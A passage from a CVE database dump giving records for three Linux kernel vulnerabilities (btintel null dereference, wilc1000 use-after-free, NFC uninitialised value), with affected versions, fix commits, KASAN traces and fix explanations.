"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ffdca0a62abaf8c41d8d9ea132000fd808de329b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "22d3053ef05f0b5045e45bd91e7473846261d65e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b79e040910101b020931ba0c9a6b77e81ab7f645",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/bluetooth/btintel.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.86",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.86",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: btintel: Fix null ptr deref in btintel_read_version\n\nIf hci_cmd_sync_complete() is triggered and skb is NULL, then\nhdev-\u003ereq_skb is NULL, which will cause this issue."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:08:43.740Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ec2049fb2b8be3e108fe2ef1f1040f91e72c9990"
},
{
"url": "https://git.kernel.org/stable/c/68a69bb2ecafaacdb998a87783068fb51736f43b"
},
{
"url": "https://git.kernel.org/stable/c/86e9b47e8a75c74b1bd83a479979b425c5dc8bd9"
},
{
"url": "https://git.kernel.org/stable/c/006936ecb4edfc3102464044f75858c714e34d28"
},
{
"url": "https://git.kernel.org/stable/c/b19fe5eea619d54eea59bb8a37c0f8d00ef0e912"
},
{
"url": "https://git.kernel.org/stable/c/ffdca0a62abaf8c41d8d9ea132000fd808de329b"
},
{
"url": "https://git.kernel.org/stable/c/22d3053ef05f0b5045e45bd91e7473846261d65e"
},
{
"url": "https://git.kernel.org/stable/c/b79e040910101b020931ba0c9a6b77e81ab7f645"
}
],
"title": "Bluetooth: btintel: Fix null ptr deref in btintel_read_version",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35933",
"datePublished": "2024-05-19T10:10:41.020Z",
"dateReserved": "2024-05-17T13:50:33.130Z",
"dateUpdated": "2025-05-04T09:08:43.740Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26895 (GCVE-0-2024-26895)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:59
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: wilc1000: prevent use-after-free on vif when cleaning up all interfaces
wilc_netdev_cleanup currently triggers a KASAN warning, which can be
observed on interface registration error path, or simply by
removing the module/unbinding device from driver:
echo spi0.1 > /sys/bus/spi/drivers/wilc1000_spi/unbind
==================================================================
BUG: KASAN: slab-use-after-free in wilc_netdev_cleanup+0x508/0x5cc
Read of size 4 at addr c54d1ce8 by task sh/86
CPU: 0 PID: 86 Comm: sh Not tainted 6.8.0-rc1+ #117
Hardware name: Atmel SAMA5
unwind_backtrace from show_stack+0x18/0x1c
show_stack from dump_stack_lvl+0x34/0x58
dump_stack_lvl from print_report+0x154/0x500
print_report from kasan_report+0xac/0xd8
kasan_report from wilc_netdev_cleanup+0x508/0x5cc
wilc_netdev_cleanup from wilc_bus_remove+0xc8/0xec
wilc_bus_remove from spi_remove+0x8c/0xac
spi_remove from device_release_driver_internal+0x434/0x5f8
device_release_driver_internal from unbind_store+0xbc/0x108
unbind_store from kernfs_fop_write_iter+0x398/0x584
kernfs_fop_write_iter from vfs_write+0x728/0xf88
vfs_write from ksys_write+0x110/0x1e4
ksys_write from ret_fast_syscall+0x0/0x1c
[...]
Allocated by task 1:
kasan_save_track+0x30/0x5c
__kasan_kmalloc+0x8c/0x94
__kmalloc_node+0x1cc/0x3e4
kvmalloc_node+0x48/0x180
alloc_netdev_mqs+0x68/0x11dc
alloc_etherdev_mqs+0x28/0x34
wilc_netdev_ifc_init+0x34/0x8ec
wilc_cfg80211_init+0x690/0x910
wilc_bus_probe+0xe0/0x4a0
spi_probe+0x158/0x1b0
really_probe+0x270/0xdf4
__driver_probe_device+0x1dc/0x580
driver_probe_device+0x60/0x140
__driver_attach+0x228/0x5d4
bus_for_each_dev+0x13c/0x1a8
bus_add_driver+0x2a0/0x608
driver_register+0x24c/0x578
do_one_initcall+0x180/0x310
kernel_init_freeable+0x424/0x484
kernel_init+0x20/0x148
ret_from_fork+0x14/0x28
Freed by task 86:
kasan_save_track+0x30/0x5c
kasan_save_free_info+0x38/0x58
__kasan_slab_free+0xe4/0x140
kfree+0xb0/0x238
device_release+0xc0/0x2a8
kobject_put+0x1d4/0x46c
netdev_run_todo+0x8fc/0x11d0
wilc_netdev_cleanup+0x1e4/0x5cc
wilc_bus_remove+0xc8/0xec
spi_remove+0x8c/0xac
device_release_driver_internal+0x434/0x5f8
unbind_store+0xbc/0x108
kernfs_fop_write_iter+0x398/0x584
vfs_write+0x728/0xf88
ksys_write+0x110/0x1e4
ret_fast_syscall+0x0/0x1c
[...]
David Mosberger-Tan initial investigation [1] showed that this
use-after-free is due to netdevice unregistration during vif list
traversal. When unregistering a net device, since the needs_free_netdev has
been set to true during registration, the netdevice object is also freed,
and as a consequence, the corresponding vif object too, since it is
attached to it as private netdevice data. The next occurrence of the loop
then tries to access freed vif pointer to the list to move forward in the
list.
Fix this use-after-free thanks to two mechanisms:
- navigate in the list with list_for_each_entry_safe, which allows to
safely modify the list as we go through each element. For each element,
remove it from the list with list_del_rcu
- make sure to wait for RCU grace period end after each vif removal to make
sure it is safe to free the corresponding vif too (through
unregister_netdev)
Since we are in a RCU "modifier" path (not a "reader" path), and because
such path is expected not to be concurrent to any other modifier (we are
using the vif_mutex lock), we do not need to use RCU list API, that's why
we can benefit from list_for_each_entry_safe.
[1] https://lore.kernel.org/linux-wireless/ab077dbe58b1ea5de0a3b2ca21f275a07af967d2.camel@egauge.net/
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 8399918f3056e1033f0f4c08eab437fb38d6f22d Version: 8399918f3056e1033f0f4c08eab437fb38d6f22d Version: 8399918f3056e1033f0f4c08eab437fb38d6f22d Version: 8399918f3056e1033f0f4c08eab437fb38d6f22d Version: 8399918f3056e1033f0f4c08eab437fb38d6f22d Version: 8399918f3056e1033f0f4c08eab437fb38d6f22d Version: 8399918f3056e1033f0f4c08eab437fb38d6f22d |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.707Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5956f4203b6cdd0755bbdd21b45f3933c7026208"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fe20e3d56bc911408fc3c27a17c59e9d7885f7d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a9545af2a533739ffb64d6c9a6fec6f13e2b505f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3da9d32b7f4a1a9f7e4bb15bb82f2b2dd6719447"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/24228dcf1d30c2231caa332be7d3090ac59fbfe9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/73a2aa0aef86c2c07be5a2f42c9e6047e1a2f7bb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cb5942b77c05d54310a0420cac12935e9b6aa21c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26895",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:48:12.761255Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:23.894Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/microchip/wilc1000/netdev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5956f4203b6cdd0755bbdd21b45f3933c7026208",
"status": "affected",
"version": "8399918f3056e1033f0f4c08eab437fb38d6f22d",
"versionType": "git"
},
{
"lessThan": "fe20e3d56bc911408fc3c27a17c59e9d7885f7d1",
"status": "affected",
"version": "8399918f3056e1033f0f4c08eab437fb38d6f22d",
"versionType": "git"
},
{
"lessThan": "a9545af2a533739ffb64d6c9a6fec6f13e2b505f",
"status": "affected",
"version": "8399918f3056e1033f0f4c08eab437fb38d6f22d",
"versionType": "git"
},
{
"lessThan": "3da9d32b7f4a1a9f7e4bb15bb82f2b2dd6719447",
"status": "affected",
"version": "8399918f3056e1033f0f4c08eab437fb38d6f22d",
"versionType": "git"
},
{
"lessThan": "24228dcf1d30c2231caa332be7d3090ac59fbfe9",
"status": "affected",
"version": "8399918f3056e1033f0f4c08eab437fb38d6f22d",
"versionType": "git"
},
{
"lessThan": "73a2aa0aef86c2c07be5a2f42c9e6047e1a2f7bb",
"status": "affected",
"version": "8399918f3056e1033f0f4c08eab437fb38d6f22d",
"versionType": "git"
},
{
"lessThan": "cb5942b77c05d54310a0420cac12935e9b6aa21c",
"status": "affected",
"version": "8399918f3056e1033f0f4c08eab437fb38d6f22d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/microchip/wilc1000/netdev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.5"
},
{
"lessThan": "5.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: wilc1000: prevent use-after-free on vif when cleaning up all interfaces\n\nwilc_netdev_cleanup currently triggers a KASAN warning, which can be\nobserved on interface registration error path, or simply by\nremoving the module/unbinding device from driver:\n\necho spi0.1 \u003e /sys/bus/spi/drivers/wilc1000_spi/unbind\n\n==================================================================\nBUG: KASAN: slab-use-after-free in wilc_netdev_cleanup+0x508/0x5cc\nRead of size 4 at addr c54d1ce8 by task sh/86\n\nCPU: 0 PID: 86 Comm: sh Not tainted 6.8.0-rc1+ #117\nHardware name: Atmel SAMA5\n unwind_backtrace from show_stack+0x18/0x1c\n show_stack from dump_stack_lvl+0x34/0x58\n dump_stack_lvl from print_report+0x154/0x500\n print_report from kasan_report+0xac/0xd8\n kasan_report from wilc_netdev_cleanup+0x508/0x5cc\n wilc_netdev_cleanup from wilc_bus_remove+0xc8/0xec\n wilc_bus_remove from spi_remove+0x8c/0xac\n spi_remove from device_release_driver_internal+0x434/0x5f8\n device_release_driver_internal from unbind_store+0xbc/0x108\n unbind_store from kernfs_fop_write_iter+0x398/0x584\n kernfs_fop_write_iter from vfs_write+0x728/0xf88\n vfs_write from ksys_write+0x110/0x1e4\n ksys_write from ret_fast_syscall+0x0/0x1c\n\n[...]\n\nAllocated by task 1:\n kasan_save_track+0x30/0x5c\n __kasan_kmalloc+0x8c/0x94\n __kmalloc_node+0x1cc/0x3e4\n kvmalloc_node+0x48/0x180\n alloc_netdev_mqs+0x68/0x11dc\n alloc_etherdev_mqs+0x28/0x34\n wilc_netdev_ifc_init+0x34/0x8ec\n wilc_cfg80211_init+0x690/0x910\n wilc_bus_probe+0xe0/0x4a0\n spi_probe+0x158/0x1b0\n really_probe+0x270/0xdf4\n __driver_probe_device+0x1dc/0x580\n driver_probe_device+0x60/0x140\n __driver_attach+0x228/0x5d4\n bus_for_each_dev+0x13c/0x1a8\n bus_add_driver+0x2a0/0x608\n driver_register+0x24c/0x578\n do_one_initcall+0x180/0x310\n kernel_init_freeable+0x424/0x484\n kernel_init+0x20/0x148\n ret_from_fork+0x14/0x28\n\nFreed by task 86:\n kasan_save_track+0x30/0x5c\n kasan_save_free_info+0x38/0x58\n __kasan_slab_free+0xe4/0x140\n kfree+0xb0/0x238\n device_release+0xc0/0x2a8\n kobject_put+0x1d4/0x46c\n netdev_run_todo+0x8fc/0x11d0\n wilc_netdev_cleanup+0x1e4/0x5cc\n wilc_bus_remove+0xc8/0xec\n spi_remove+0x8c/0xac\n device_release_driver_internal+0x434/0x5f8\n unbind_store+0xbc/0x108\n kernfs_fop_write_iter+0x398/0x584\n vfs_write+0x728/0xf88\n ksys_write+0x110/0x1e4\n ret_fast_syscall+0x0/0x1c\n [...]\n\nDavid Mosberger-Tan initial investigation [1] showed that this\nuse-after-free is due to netdevice unregistration during vif list\ntraversal. When unregistering a net device, since the needs_free_netdev has\nbeen set to true during registration, the netdevice object is also freed,\nand as a consequence, the corresponding vif object too, since it is\nattached to it as private netdevice data. The next occurrence of the loop\nthen tries to access freed vif pointer to the list to move forward in the\nlist.\n\nFix this use-after-free thanks to two mechanisms:\n- navigate in the list with list_for_each_entry_safe, which allows to\n safely modify the list as we go through each element. For each element,\n remove it from the list with list_del_rcu\n- make sure to wait for RCU grace period end after each vif removal to make\n sure it is safe to free the corresponding vif too (through\n unregister_netdev)\n\nSince we are in a RCU \"modifier\" path (not a \"reader\" path), and because\nsuch path is expected not to be concurrent to any other modifier (we are\nusing the vif_mutex lock), we do not need to use RCU list API, that\u0027s why\nwe can benefit from list_for_each_entry_safe.\n\n[1] https://lore.kernel.org/linux-wireless/ab077dbe58b1ea5de0a3b2ca21f275a07af967d2.camel@egauge.net/"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:59:06.398Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5956f4203b6cdd0755bbdd21b45f3933c7026208"
},
{
"url": "https://git.kernel.org/stable/c/fe20e3d56bc911408fc3c27a17c59e9d7885f7d1"
},
{
"url": "https://git.kernel.org/stable/c/a9545af2a533739ffb64d6c9a6fec6f13e2b505f"
},
{
"url": "https://git.kernel.org/stable/c/3da9d32b7f4a1a9f7e4bb15bb82f2b2dd6719447"
},
{
"url": "https://git.kernel.org/stable/c/24228dcf1d30c2231caa332be7d3090ac59fbfe9"
},
{
"url": "https://git.kernel.org/stable/c/73a2aa0aef86c2c07be5a2f42c9e6047e1a2f7bb"
},
{
"url": "https://git.kernel.org/stable/c/cb5942b77c05d54310a0420cac12935e9b6aa21c"
}
],
"title": "wifi: wilc1000: prevent use-after-free on vif when cleaning up all interfaces",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26895",
"datePublished": "2024-04-17T10:27:46.585Z",
"dateReserved": "2024-02-19T14:20:24.186Z",
"dateUpdated": "2025-05-04T08:59:06.398Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35915 (GCVE-0-2024-35915)
Vulnerability from cvelistv5
Published
2024-05-19 08:35
Modified
2025-05-04 09:08
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nfc: nci: Fix uninit-value in nci_dev_up and nci_ntf_packet
syzbot reported the following uninit-value access issue [1][2]:
nci_rx_work() parses and processes received packet. When the payload
length is zero, each message type handler reads uninitialized payload
and KMSAN detects this issue. The receipt of a packet with a zero-size
payload is considered unexpected, and therefore, such packets should be
silently discarded.
This patch resolved this issue by checking payload size before calling
each message type handler codes.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 6a2968aaf50c7a22fced77a5e24aa636281efca8 Version: 6a2968aaf50c7a22fced77a5e24aa636281efca8 Version: 6a2968aaf50c7a22fced77a5e24aa636281efca8 Version: 6a2968aaf50c7a22fced77a5e24aa636281efca8 Version: 6a2968aaf50c7a22fced77a5e24aa636281efca8 Version: 6a2968aaf50c7a22fced77a5e24aa636281efca8 Version: 6a2968aaf50c7a22fced77a5e24aa636281efca8 Version: 6a2968aaf50c7a22fced77a5e24aa636281efca8 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35915",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T17:12:44.324505Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:39.499Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.232Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/11387b2effbb55f58dc2111ef4b4b896f2756240"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/03fe259649a551d336a7f20919b641ea100e3fff"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/755e53bbc61bc1aff90eafa64c8c2464fd3dfa3c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ac68d9fa09e410fa3ed20fb721d56aa558695e16"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b51ec7fc9f877ef869c01d3ea6f18f6a64e831a7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a946ebee45b09294c8b0b0e77410b763c4d2817a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8948e30de81faee87eeee01ef42a1f6008f5a83a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d24b03535e5eb82e025219c2f632b485409c898f"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/nfc/nci/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "11387b2effbb55f58dc2111ef4b4b896f2756240",
"status": "affected",
"version": "6a2968aaf50c7a22fced77a5e24aa636281efca8",
"versionType": "git"
},
{
"lessThan": "03fe259649a551d336a7f20919b641ea100e3fff",
"status": "affected",
"version": "6a2968aaf50c7a22fced77a5e24aa636281efca8",
"versionType": "git"
},
{
"lessThan": "755e53bbc61bc1aff90eafa64c8c2464fd3dfa3c",
"status": "affected",
"version": "6a2968aaf50c7a22fced77a5e24aa636281efca8",
"versionType": "git"
},
{
"lessThan": "ac68d9fa09e410fa3ed20fb721d56aa558695e16",
"status": "affected",
"version": "6a2968aaf50c7a22fced77a5e24aa636281efca8",
"versionType": "git"
},
{
"lessThan": "b51ec7fc9f877ef869c01d3ea6f18f6a64e831a7",
"status": "affected",
"version": "6a2968aaf50c7a22fced77a5e24aa636281efca8",
"versionType": "git"
},
{
"lessThan": "a946ebee45b09294c8b0b0e77410b763c4d2817a",
"status": "affected",
"version": "6a2968aaf50c7a22fced77a5e24aa636281efca8",
"versionType": "git"
},
{
"lessThan": "8948e30de81faee87eeee01ef42a1f6008f5a83a",
"status": "affected",
"version": "6a2968aaf50c7a22fced77a5e24aa636281efca8",
"versionType": "git"
},
{
"lessThan": "d24b03535e5eb82e025219c2f632b485409c898f",
"status": "affected",
"version": "6a2968aaf50c7a22fced77a5e24aa636281efca8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/nfc/nci/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.2"
},
{
"lessThan": "3.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "3.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "3.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "3.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "3.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "3.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "3.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfc: nci: Fix uninit-value in nci_dev_up and nci_ntf_packet\n\nsyzbot reported the following uninit-value access issue [1][2]:\n\nnci_rx_work() parses and processes received packet. When the payload\nlength is zero, each message type handler reads uninitialized payload\nand KMSAN detects this issue. The receipt of a packet with a zero-size\npayload is considered unexpected, and therefore, such packets should be\nsilently discarded.\n\nThis patch resolved this issue by checking payload size before calling\neach message type handler codes."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:08:17.927Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/11387b2effbb55f58dc2111ef4b4b896f2756240"
},
{
"url": "https://git.kernel.org/stable/c/03fe259649a551d336a7f20919b641ea100e3fff"
},
{
"url": "https://git.kernel.org/stable/c/755e53bbc61bc1aff90eafa64c8c2464fd3dfa3c"
},
{
"url": "https://git.kernel.org/stable/c/ac68d9fa09e410fa3ed20fb721d56aa558695e16"
},
{
"url": "https://git.kernel.org/stable/c/b51ec7fc9f877ef869c01d3ea6f18f6a64e831a7"
},
{
"url": "https://git.kernel.org/stable/c/a946ebee45b09294c8b0b0e77410b763c4d2817a"
},
{
"url": "https://git.kernel.org/stable/c/8948e30de81faee87eeee01ef42a1f6008f5a83a"
},
{
"url": "https://git.kernel.org/stable/c/d24b03535e5eb82e025219c2f632b485409c898f"
}
],
"title": "nfc: nci: Fix uninit-value in nci_dev_up and nci_ntf_packet",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
